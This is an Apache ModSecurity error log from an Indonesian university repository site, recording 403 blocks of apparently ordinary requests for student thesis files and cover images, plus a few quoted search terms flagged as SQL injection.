[Mon Aug 28 13:43:50.279630 2023] [:error] [pid 44116] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//DAFTAR PUSTAKA_Fadilla Hasyanah_41152020190024.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOxCJsCo-f0AAKxUOAcAAAAO"]
[Mon Aug 28 13:44:01.818838 2023] [:error] [pid 44244] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/cover_Naumi_Permata_Abdi-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxCMcCo-f0AAKzUvFYAAAAI"]
[Mon Aug 28 13:44:08.132033 2023] [:error] [pid 44117] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//Dapus Naumi Permata Abdi.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOxCOMCo-f0AAKxViv0AAAAS"]
[Mon Aug 28 13:44:17.410418 2023] [:error] [pid 44253] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/cover_Naumi_Permata_Abdi-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxCQcCo-f0AAKzdlxAAAAAH"]
[Mon Aug 28 13:44:42.560884 2023] [:error] [pid 44271] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/cover_Naumi_Permata_Abdi-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxCWsCo-f0AAKzvhfQAAAAM"]
[Mon Aug 28 13:44:48.097971 2023] [:error] [pid 44269] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//cover-daftar lampiran Naumi Permata Abdi.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOxCYMCo-f0AAKztWZwAAAAI"]
[Mon Aug 28 13:45:49.090538 2023] [:error] [pid 44294] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_Fitri_Nuryani_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxCncCo-f0AAK0GR9wAAAAO"]
[Mon Aug 28 13:45:58.910517 2023] [:error] [pid 44293] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_Fadiila_Hasyanah_41152020190024-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxCpsCo-f0AAK0FVG0AAAAM"]
[Mon Aug 28 13:46:11.104728 2023] [:error] [pid 44281] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/cover_Naumi_Permata_Abdi-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxCs8Co-f0AAKz5k@oAAAAX"]
[Mon Aug 28 13:46:40.559051 2023] [:error] [pid 44111] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//Dapus Naumi Permata Abdi.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOxC0MCo-f0AAKxP1zMAAAAC"]
[Mon Aug 28 13:50:30.915272 2023] [:error] [pid 44279] [client 140.213.100.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_ENI_PUSPA_SERUNI.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxDtsCo-f0AAKz3DG4AAAAV"]
[Mon Aug 28 13:50:45.825022 2023] [:error] [pid 44370] [client 47.128.20.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/cover_(Marlina).jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxDxcCo-f0AAK1Sj30AAAAM"]
[Mon Aug 28 13:52:26.082762 2023] [:error] [pid 44366] [client 140.213.47.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_ENI_PUSPA_SERUNI.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxEKsCo-f0AAK1OBrkAAAAK"]
[Mon Aug 28 13:52:32.193511 2023] [:error] [pid 44396] [client 140.213.47.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_ENI_PUSPA_SERUNI.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxEMMCo-f0AAK1sKE4AAAAG"]
[Mon Aug 28 13:52:48.231444 2023] [:error] [pid 44441] [client 140.213.47.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/cover_Cikal_Yani_Basse-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxEQMCo-f0AAK2Zy-sAAAAO"]
[Mon Aug 28 13:53:12.657504 2023] [:error] [pid 44433] [client 140.213.47.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/cover_Cikal_Yani_Basse-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxEWMCo-f0AAK2RkS4AAAAP"]
[Mon Aug 28 13:53:20.008405 2023] [:error] [pid 44431] [client 140.213.47.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//LAMPIRAN Cikal Yani Basse.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOxEYMCo-f0AAK2Pjf4AAAAJ"]
[Mon Aug 28 13:53:35.942791 2023] [:error] [pid 44352] [client 140.213.47.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//LAMPIRAN Cikal Yani Basse.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOxEb8Co-f0AAK1AsLwAAAAQ"]
[Mon Aug 28 13:53:53.267274 2023] [:error] [pid 44453] [client 140.213.47.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//DAFTAR PUSTAKA Cikal Yani Basse.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOxEgcCo-f0AAK2lSkMAAAAD"]
[Mon Aug 28 13:53:57.622818 2023] [:error] [pid 44453] [client 140.213.47.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//cover s.d daftar lampiran Cikal Yani Basse.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOxEhcCo-f0AAK2lSkUAAAAD"]
[Mon Aug 28 13:54:16.456354 2023] [:error] [pid 44453] [client 140.213.47.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/01.COVER_-_Gery_Renaldi_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxEmMCo-f0AAK2lSkgAAAAD"]
[Mon Aug 28 13:54:22.406491 2023] [:error] [pid 44452] [client 140.213.47.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//08.LAMPIRAN Gery Renaldi.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOxEnsCo-f0AAK2ksoEAAAAC"]
[Mon Aug 28 13:54:30.120880 2023] [:error] [pid 44464] [client 140.213.47.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//08.LAMPIRAN Gery Renaldi.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOxEpsCo-f0AAK2wspkAAAAR"]
[Mon Aug 28 14:09:17.632954 2023] [:error] [pid 44494] [client 47.128.26.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_SILVIA_page-0001.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxIHcCo-f0AAK3OGpUAAAAc"]
[Mon Aug 28 14:10:10.401000 2023] [:error] [pid 44716] [client 47.128.29.151] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_Sansan_Septiar_Winando.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxIUsCo-f0AAK6sKcsAAAAW"]
[Mon Aug 28 14:23:39.000005 2023] [:error] [pid 44812] [client 47.128.29.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_Putri_Maharani_Kusuma_Dewi_41152010160370.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxLesCo-f0AAK8MmB0AAAAC"]
[Mon Aug 28 15:36:42.331633 2023] [:error] [pid 46243] [client 65.108.40.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\xe2\\x80\\x93  found within ARGS:subject: \\x22harga saham rata \\xe2\\x80\\x93 rata\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxcmsCo-f0AALSjQe8AAAAG"]
[Mon Aug 28 15:41:27.385495 2023] [:error] [pid 46522] [client 47.128.23.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Kualitas Informasi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxdt8Co-f0AALW65SUAAAAK"]
[Mon Aug 28 15:41:27.538509 2023] [:error] [pid 46522] [client 47.128.23.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Kualitas Informasi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxdt8Co-f0AALW65SYAAAAK"]
[Mon Aug 28 15:59:21.388640 2023] [:error] [pid 46811] [client 47.128.18.223] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/1._COVER_(MUFID_FAIZATUSSSOLEHAH_41152020190045)-1_page-0001.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxh6cCo-f0AALbbhZoAAAAO"]
[Mon Aug 28 16:17:10.859909 2023] [:error] [pid 47138] [client 36.80.96.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER-annur_fitri.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxmFsCo-f0AALgiOaMAAAAE"]
[Mon Aug 28 16:17:46.334186 2023] [:error] [pid 47153] [client 36.80.96.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_DEVIA_MUTIARA_RAHAYU_41152010160277.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxmOsCo-f0AALgxx6AAAAAT"]
[Mon Aug 28 16:17:50.971306 2023] [:error] [pid 47148] [client 36.80.96.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB 1 Devia Mutiara Rahayu.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOxmPsCo-f0AALgs@6QAAAAB"]
[Mon Aug 28 16:17:59.729184 2023] [:error] [pid 47149] [client 36.80.96.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB 1 Devia Mutiara Rahayu.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOxmR8Co-f0AALgtDGgAAAAC"]
[Mon Aug 28 16:18:09.661190 2023] [:error] [pid 47148] [client 36.80.96.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB 1 Devia Mutiara Rahayu.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOxmUcCo-f0AALgs@6YAAAAB"]
[Mon Aug 28 16:18:21.004176 2023] [:error] [pid 47120] [client 36.80.96.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_ERINE_DEFITA_SARI.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxmXcCo-f0AALgQwX0AAAAU"]
[Mon Aug 28 16:18:24.319404 2023] [:error] [pid 47154] [client 36.80.96.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//ERINE DEFITA SARI Cover - Bab II.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOxmYMCo-f0AALgyricAAAAI"]
[Mon Aug 28 16:18:32.047149 2023] [:error] [pid 47131] [client 36.80.96.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_Wulandari_41152010160056.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxmaMCo-f0AALgbrfcAAAAZ"]
[Mon Aug 28 16:18:38.403808 2023] [:error] [pid 47144] [client 36.80.96.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//Wulandari 41152010160056 Cover - Bab II.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOxmbsCo-f0AALgoZ4QAAAAR"]
[Mon Aug 28 16:18:45.595235 2023] [:error] [pid 47196] [client 36.80.96.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_Daniel_Ramdhani_Permana_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxmdcCo-f0AALhcxFUAAAAJ"]
